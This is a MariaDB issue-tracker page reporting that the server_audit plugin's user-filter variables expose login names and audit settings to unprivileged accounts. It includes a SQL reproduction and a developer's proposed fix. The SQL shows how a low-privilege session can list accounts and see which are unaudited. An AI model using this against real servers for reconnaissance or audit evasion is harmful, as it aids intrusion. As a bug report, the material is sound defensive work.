MariaDB Server / MDEV-5245

Audit plugin reveals user lists to unprivileged users

    Details

    • Type: Task
    • Status: In Progress
    • Priority: Major
    • Resolution: Unresolved
    • Fix Version/s: None
    • Component/s: None
    • Labels: None

      Description

      It's not a bug from the coding perspective, but possibly a specification one, or at least a point for consideration.

      When server_audit_excl_users or server_audit_incl_users are configured, they (as other variables) are visible to any database user, even the least privileged ones. Thus a user gets access to other users' login names and audit settings which is probably not a good idea in production.

      At the moment I don't have any suggestions on how to make it better, I'm not sure if there are any mechanisms to hide a system variable contents from a user.
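The disclosure described above can be reproduced with a few statements. This is an added example written for this page, not a script from the MariaDB issue or the server_audit plugin; it assumes the server_audit plugin is loaded, and the account names, password and filter values are made up.

```sql
-- Added example (not from the MariaDB issue or the plugin sources):
-- reproduce the disclosure described in the report. Assumes server_audit
-- is loaded; the account names, password and filter values are invented.

-- As an administrator (SET GLOBAL requires SUPER): configure the audit
-- filter and create an account that can connect but has no other privilege.
SET GLOBAL server_audit_incl_users = 'app_rw,backup_svc,dba_alice';
CREATE USER 'lowpriv'@'localhost' IDENTIFIED BY 'assumed-password';
GRANT USAGE ON *.* TO 'lowpriv'@'localhost';

-- Now connect as lowpriv@localhost (e.g. mysql -ulowpriv -p) and run:
SHOW GRANTS;
-- GRANT USAGE ON *.* TO 'lowpriv'@'localhost' ...   (nothing else)

-- The account list itself is protected: this fails for lowpriv.
SELECT User, Host FROM mysql.user;
-- ERROR 1142 (42000): SELECT command denied to user 'lowpriv'@'localhost'
--                      for table 'user'

-- But the audit filter variables are world-readable, and they repeat
-- the login names that mysql.user refused to give us.
SHOW GLOBAL VARIABLES LIKE 'server_audit_%_users';
-- server_audit_excl_users | (empty)
-- server_audit_incl_users | app_rw,backup_svc,dba_alice

-- The same data is reachable through INFORMATION_SCHEMA, which is the
-- path any client library that inspects server settings will take.
SELECT VARIABLE_NAME, VARIABLE_VALUE
  FROM information_schema.GLOBAL_VARIABLES
 WHERE VARIABLE_NAME IN ('server_audit_incl_users',
                         'server_audit_excl_users');
```

The contrast with the failed read of mysql.user is the point: the server correctly withholds the account table from an unprivileged login, yet any session can recover part of that list, plus which accounts are or are not audited, from a plain system variable.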

Activity

              serg Sergei Golubchik added a comment -

              I could think of a workaround. E.g. keep the variable value (the string that's shown in I_S and SHOW) always empty, the update callback will update internal filters but not the user-visible variable value.

              That's kind of bad, because the user won't see the current filter.

              It can be exported via another status variable, and there SHOW_FUNC will check privileges and only show the filter to a SUPER user.

              The main question — is this something we want to do?


                People

                • Assignee: holyfoot Alexey Botchkov
                • Reporter: elenst Elena Stepanova
                • Votes: 0
                • Watchers: 2
